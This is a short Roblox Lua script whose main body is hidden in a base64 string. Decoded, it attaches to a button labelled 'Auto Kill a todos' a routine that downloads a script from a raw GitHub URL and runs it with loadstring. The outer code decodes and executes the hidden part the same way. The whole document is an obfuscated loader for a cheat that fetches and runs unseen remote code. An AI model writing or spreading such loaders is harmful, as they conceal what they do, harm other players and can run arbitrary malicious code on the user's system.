local base64 = [[
CmxvY2FsIFBsYXllcnMgPSBnYW1lOkdldFNlcnZpY2UoIlBsYXllcnMiKQpsb2NhbCBUd2VlblNlcnZpY2UgPSBnYW1lOkdldFNlcnZpY2UoIlR3ZWVuU2VydmljZSIpCi0tIFJlc3Qgb2YgdGhlIHNjcmlwdCBoZXJlLi4uCmJ1dHRvbnNbIkF1dG8gS2lsbCBhIHRvZG9zIl0uTW91c2VCdXR0b24xQ2xpY2s6Q29ubmVjdChmdW5jdGlvbigpCiAgICBsb2NhbCB1cmwgPSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3lvdXNzZWZkZXY2NTIvTmV3L3JlZnMv
aGVhZHMvbWFpbi9Mb2NhbCUyMHVybCIKICAgIGxvY2FsIHN1Y2Nlc3MsIHJlc3BvbnNlID0gcGNhbGwoZnVuY3Rpb24oKQogICAgICAgIHJldHVybiBnYW1lOkh0dEdldCh1cmwpCiAgICBlbmQpCiAgICBpZiBzdWNjZXNzIGFuZCByZXNwb25zZSB0aGVuCiAgICAgICAgbG9hZHN0cmluZyhyZXNwb25zZSkoKQogICAgZWxzZQogICAgICAgIHdhcm4oIkVycm9yIGNhcmdhbmRvIHNjcmlwdCAnQXV0byBLaWxsIGEg
dG9kb3MnIikKICAgIGVuZCBlbmQp
]]

local decoded = game:GetService("HttpService"):Base64Decode(base64)
loadstring(decoded)()
